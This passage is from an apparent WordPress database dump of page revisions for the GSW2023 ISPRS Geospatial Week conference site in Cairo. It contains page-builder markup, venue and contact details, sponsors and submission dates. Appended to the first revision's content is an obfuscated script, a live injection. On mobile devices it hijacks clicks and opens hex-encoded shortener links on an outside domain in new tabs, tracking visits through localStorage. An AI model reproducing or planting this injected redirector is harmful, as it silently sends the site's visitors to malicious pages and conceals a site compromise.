September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-06 22:28:30','2023-04-06 22:28:30','',3066,'https://gsw2023.com/?p=4034',0,'revision','',0),
(4035,1,'2023-04-06 22:29:51','2023-04-06 22:29:51','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680403737829{margin-top: 130px !important;}\"]<img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680820176656{margin-top: 88px !important;}\"]<img class=\"alignnone size-medium wp-image-4033 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"][/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" 